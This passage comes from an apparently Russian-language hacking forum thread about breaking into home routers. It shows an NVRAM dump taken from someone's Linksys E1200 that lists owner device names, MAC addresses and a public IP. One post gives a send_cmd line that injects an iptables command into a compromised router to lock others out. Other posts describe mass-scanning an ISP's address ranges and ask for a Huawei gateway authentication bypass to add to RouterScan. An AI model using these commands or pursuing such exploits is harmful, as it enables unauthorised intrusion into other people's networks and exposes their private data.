    wk_mode=gateway
    ddns_passwd_buf=
    filter_tod6=
    wl0_maclist=
    nf_alg_sip=0
    filter_tod7=
    wl_radio_pwrsave_quiet_time=1800
    sdram_init=0x0000
    filter_tod8=
    wl_rts=2347
    stbcpo=0x0000
    filter_tod9=
    lan_wins=
    wl_ap_isolate=0
    wan_pptp_dns0=
    aol_block_traffic=0
    get_pa0idxval=
    lan_hwnames=
    wl_mac_list=
    wps_modelnum=123456
    wan_pptp_dns1=
    ip_conntrack_udp_timeouts=65 180
    device_info_mac20=00:1C:C0:19:CF:8A
    lan1_ifnames=wl0.1 wl0.2 wl0.3 wl1.1 wl1.2 wl1.3
    wan_pptp_dns2=
    wps_method=1
    device_info_mac21=00:1C:C0:09:E0:4E
    dhcp1_end=192.168.2.150
    gn_bw_downstream=128
    wl_wme_no_ack=off
    lan_upnp_wfa_subc_num=0
    device_info_mac22=00:1E:4F:9D:FC:76
    device_info_mac23=00:0B:DB:8B:3B:72
    filter_dport_grp10=
    wl0_radius_key=
    wl0_wps_config_state=1
    device_info_name0=Muhammad-Sohail
    device_info_mac24=00:11:43:C1:19:9A
    device_info_name1=Nadir-Qureshi
    wl0_wme_ap_be=15 63 3 0 0 off off
    ddns_username_buf=
    lang_detected=1
    device_info_mac25=00:0B:DB:4F:84:89
    device_info_name2=Tauseef-PC
    wl0_corerev=28
    gn_dhcp_start=100
    wl0_nmcsidx=-1
    device_info_mac26=00:19:D1:85:89:13
    device_info_name3=
    wl_key=1
    device_info_mac27=00:16:76:59:78:F5
    device_info_name4=
    wl0_channel=0
    device_info_mac28=00:0B:DB:55:FB:0B
    device_info_name5=
    wl0_wds_timeout=1
    wps_device_name=E1200
    http_host=125.209.97.22:8080
    device_info_mac29=00:06:5B:4F:E3:13
    device_info_name6=
    cddpo=0x0000
    get_pa0idxval_index=0
    wl0.1_bss_enabled=0
    device_info_name7=
    upnp_enable=1
    wl_bss_enabled=1
    wl0_wps_mode=enabled
    wl0_wme_ap_bk=15 1023 7 0 0 off off
    dr_setting=0
    device_info_name8=
    wps_config_method=0x84
    wl_wme_txp_be=7 3 4 2 0
    device_info_name9=
    emf_uffp_entry=
    filter_rule10=
    ddns_status=
    lan1_hwaddr=
    dmz_src_any=1
    wl0_radio_pwrsave_quiet_time=1800
    wl_dfs_preism=60
    wl_sta_retry_time=5
    device_info_set_flag10=0
    wl_closed=0
    wl0_auth_mode=none
    wl_wme_txp_bk=7 3 4 2 0
    device_info_set_flag11=0
    boot_ver=v5.2.3
    wl0_radio_pwrsave_enable=0
    device_info_set_flag12=0
    wl0.6_hwaddr=5A:6D:8F:B1:F7:E4
    autofw_port0=
    device_info_set_flag13=0
    boardnum=42
    language=EN
    wl0_crypto=aes
    device_info_set_flag14=0
    wl0_txchain=3
    def_hwaddr=00:00:00:00:00:00
    device_info_set_flag15=0
    detect_charset=UTF-8
    wl_bcn=100
    device_info_set_flag16=0
    wl_reg_mode=off
    wl_wep_buf=
    device_info_set_flag17=0
    get_pa1idxval_index=0
    device_info_set_flag18=0
    get_sn_index=1
    upnp_config=1
    wl_mac_filter=0
    device_info_set_flag19=0
    filter_dport_grp1=
    QoS_wan_ctl=1
    filter_dport_grp2=
    wl_antdiv=-1
    multicast_max=25
    size: 17588 bytes (47948 left)

    Потом главное не забыть закрыть калитку:
    Code:
    send_cmd(data, http, url, headers, 'iptables -I INPUT -p tcp --dport 23 -j DROP')
     
    #1317 gpuhash, 21 Oct 2015
    Last edited: 21 Oct 2015
  18. djamv

    djamv Member

    Joined:
    16 Oct 2012
    Messages:
    129
    Likes Received:
    45
    Reputations:
    0
    Потратил около недели на сканирование локальных дипазонов своего провайдера (около 10ти населенных пунктов), скан работал круглые сутки. Заливал на 3wifi, сейчас смотрю что сторой базы уже нет?
     
  19. Felis-Sapiens

    Felis-Sapiens Reservists Of Antichat

    Joined:
    21 Jul 2015
    Messages:
    616
    Likes Received:
    3,833
    Reputations:
    171
    #1319 Felis-Sapiens, 22 Oct 2015
    Last edited: 22 Oct 2015
    Payer, binarymaster and Upsurt like this.
  20. sha9

    sha9 Well-Known Member

    Joined:
    25 Sep 2015
    Messages:
    568
    Likes Received:
    735
    Reputations:
    2
    доброго времени суток. вот столкнулся с проблемкой. рутскан не парсит пароли на huawei home gateway. дефолтов нет. эксплойты нашел только по замене пасса.но это не нужно. никто не встречал эксплойт именно по обходу авторизации? кстати, можно было бы прикрутить его к рутерскану тоже. особенно в европе ( балканы) актуален этот роутер
     
    #1320 sha9, 22 Oct 2015
    Last edited: 22 Oct 2015
    Upsurt likes this.